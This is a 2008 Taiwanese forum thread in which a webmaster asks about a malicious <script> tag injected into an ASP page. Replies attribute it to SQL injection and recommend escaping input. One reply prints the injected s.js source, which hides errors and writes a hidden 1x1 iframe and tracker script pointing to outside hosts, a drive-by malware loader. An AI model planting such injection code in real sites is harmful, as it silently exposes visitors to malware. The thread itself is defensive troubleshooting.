iT邦幫忙

0

網頁被植入惡意程式....

  • 分享至 

  • xImage

這個網頁
http://www.renan.com.tw/simpchinese/CNC.asp

我查看原始檔,發現被植入了一個奇怪的JS連結
<script src=http://s.see9.us/s.js></script>

即使把檔案砍掉,換新的上去
上面還是會有這個連結
該怎麼辦呢?
這個連結是做什麼用的?
他是怎麼植入的呢?

懇請高人指點迷津
感激不盡

看更多先前的討論...收起先前的討論...
funkent iT邦高手 1 級 ‧ 2008-05-15 23:21:20 檢舉
這個題目怎麼討論這麼不熱烈阿
davistai iT邦大師 1 級 ‧ 2008-05-19 09:44:27 檢舉
應該是沒有很多人碰過這種問題? 還是因為回答的人不夠多吧??
魯大 iT邦高手 1 級 ‧ 2008-05-19 10:25:10 檢舉
也或許是因為它可能帶有惡意程式
所以沒人想測試吧
cyrilwang iT邦新手 3 級 ‧ 2008-05-19 10:29:50 檢舉
大於符號跟小於符號在HTML有特殊的意義(標籤開始與結束字元),所以除非你本來就期待資料內會出現這些字元,不然就應該將這些字元做跳脫的處理。做完跳脫後,HTML網頁會秀出這些符號,而不是當作HTML的特殊字元處理。除了這兩個字元還有其他字元需要處理。不過一般Web開發程式語言都有相關的函式可以處理HTML字元的跳脫,只是函式名稱不盡相同,需要自行查閱該語言的函式說明。
而單引號與雙引號,除了對HTML有特殊意義外,對資料庫本身也有特殊意義(通常表示字串的開始與結束),所以同樣需要做字元的跳脫。此外像是註解的標示符號等也需要跳脫。如果你是直接連結資料庫下SQL指令,需要把該資料庫使用的特殊字元都做一些過濾(每個資料庫不盡相同)。但是如果你有使用一些Data Access的元件,有些會幫你處理這些特殊字元。看文件跟測試是建議的做法。雖然很花時間,不過因為這是共通性的需求,所有的相關程式都可以使用。
phonkaii iT邦新手 4 級 ‧ 2008-05-27 15:34:41 檢舉
如果資料已經經過處理,還是會遭受攻擊,那還有哪裡有漏洞??

資料處理如下:
msg_content = Replace(Replace(Replace(msUpload.form("msg_content"), "<", "&lt;"), ">", "&gt;"), """", "&quot;")

包含HTML的 "<" ">" 以及雙引號,都有處理過
可是還是被攻擊了 >"<
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中
34
魯大
iT邦高手 1 級 ‧ 2008-05-14 10:59:30
最佳解答

你可以試著用flashget或相關下載軟體將s.js這個檔案下載下來看看
我有稍微試了一下,可以下載下來
再把它打開來解讀看看
或許可以看出是否為惡意程式..

就我所知道 .js 一般都是javascript在使用的

提供給你做參考..

38
cyrilwang
iT邦新手 3 級 ‧ 2008-05-14 11:04:44

找了一下,可能是大陸那邊放出來的,討論區說是透過SQL Injection的方式所感染的。
我找了Google,發現被感染的好像不在少數,被感染的大部分title都會變成
公交車上的極品對白(超搞笑)"></"></title>
請注意兩個雙引號中間的東西...這個應該不是正常網頁title會出現的格式。

phonkaii iT邦新手 4 級 ‧ 2008-05-19 09:28:35 檢舉

輸出的時候最好也可以把HTML字元先處理

請問是要做什麼處理呢??
把 < " > 都取代成空白字元嗎?
還是還有其他要注意的?
謝謝^^

30
fillano
iT邦超人 1 級 ‧ 2008-05-14 11:05:32

沒有仔細看,不過會透過js在網頁內嵌隱藏的iframe,然後在iframe裡面透過ActiveXObject來打開mediaplayer或realplayer的樣子。

至於為什麼會被嵌入,那要看看你asp怎麼寫的吧。伺服器也可能需要好好檢查。

26
funkent
iT邦高手 1 級 ‧ 2008-05-14 21:47:56

補充該檔案的原始碼
document.writeln("<base onmouseover=\"window.status=\'完毕 \';return true\">");
document.writeln("<SCRIPT LANGUAGE=\"JavaScript\"> ");
document.writeln("<!-- Hide ");
document.writeln("function killErrors() { ");
document.writeln("return true; ");
document.writeln("} ");
document.writeln("window.onerror = killErrors; ");
document.writeln("\/\/ --> ");
document.writeln("<\/SCRIPT>");
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie10="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie10=risb;expires="+ Then.toGMTString()
document.writeln("<IFRaME src=\"http://b.kaobt.cn/img/hei.htm\" width=1 height=1><\/IFRAME>");
document.write("<div style=\"display:none\">");
document.write ('<script language="javascript" type="text/javascript" src="http://js.users.51.la/1871936.js"></script>');

}
}Get();

phonkaii iT邦新手 4 級 ‧ 2008-05-19 09:27:18 檢舉

哇.....
這些程式碼,都是 JavaScript
那他到底在做些甚麼呢??
可以請大大幫我解答一下嗎?

8
henry312066
iT邦研究生 3 級 ‧ 2008-05-19 00:08:28

scrip原是要有更多的特色的
想不到卻成了犯罪工具

我要發表回答

立即登入回答